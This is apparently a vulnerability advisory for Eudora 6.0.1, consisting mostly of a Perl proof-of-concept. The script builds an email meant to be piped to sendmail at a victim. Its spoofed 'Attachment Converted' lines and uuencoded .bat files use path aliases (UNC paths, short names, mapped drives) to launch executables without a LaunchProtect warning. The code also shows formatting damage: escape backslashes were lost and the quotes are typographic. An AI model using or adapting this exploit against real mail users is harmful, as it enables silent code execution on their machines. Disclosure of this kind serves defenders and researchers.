‘Eudora LaunchProtect Bypassing’

Details

‘Vulnerable systems:
 * Eudora version 6.0.1

Exploit:
#!/usr/bin/perl —

use MIME::Base64;

print ‘From: men’;
print ‘To: youn’;
print ‘Subject: Eudora 6.0.1 on Windows spoof, LaunchProtectn’;
print ‘n’;

print ‘Pipe the output of this script into: sendmail -i victimn’;

print ‘
Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an executable
stored elsewhere to run without warning:n’;
print ‘Attachment Convertedr: <a href=c:/winnt/system32/calc>go.txt</a>n’;
print ‘Attachment Convertedr: c:/winnt/system32/calcn’;

$X = ‘README’; $Y = ‘$X.bat’;
print ‘nThe X – X.exe dichotomy: send a plain $X attachment:n’;
$z = ‘rem Funny jokernpausern’;
print ‘begin 600 $Xn’, pack(‘u’,$z), ‘`nendn’;
print ‘nand (in another message or) after some blurb so is scrolled off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LauchProtect warning):n’;
$z = ‘rem Big jokernrem Should do something nastyrnpausern’;
print ‘begin 600 $Yn’, pack(‘u’,$z), ‘`nendn’;

print ‘
Can be exploited if there is more than one way into attach: in my setup
H: and \\rome\home are the same thing, but Eudora does not know that.n’;
print ‘These elicit warnings:n’;
print ‘Attachment Convertedr: <a href=h:/eudora/attach/README>readme</a>n’;
print ‘Attachment Convertedr: h:/eudora/attach/READMEn’;
print ‘while these do the bad thing without warning:n’;
print ‘Attachment Convertedr: <a href=file://rome/home/eudora/attach/README>readme</a>n’;
print ‘Attachment Convertedr: //rome/home/eudora/attach/READMEn’;
print ‘Attachment Convertedr: \\rome\home\eudora\attach\READMEn’;

print ‘
For the default setup, Eudora knows that C:\Program Files
and C:\Progra~1 are the same thing…n’;
print ‘Attachment Convertedr: ‘c:/program files/qualcomm/eudora/attach/README’n’;
print ‘Attachment Convertedr: ‘c:/progra~1/qualcomm/eudora/attach/README’n’;

print ‘n’;’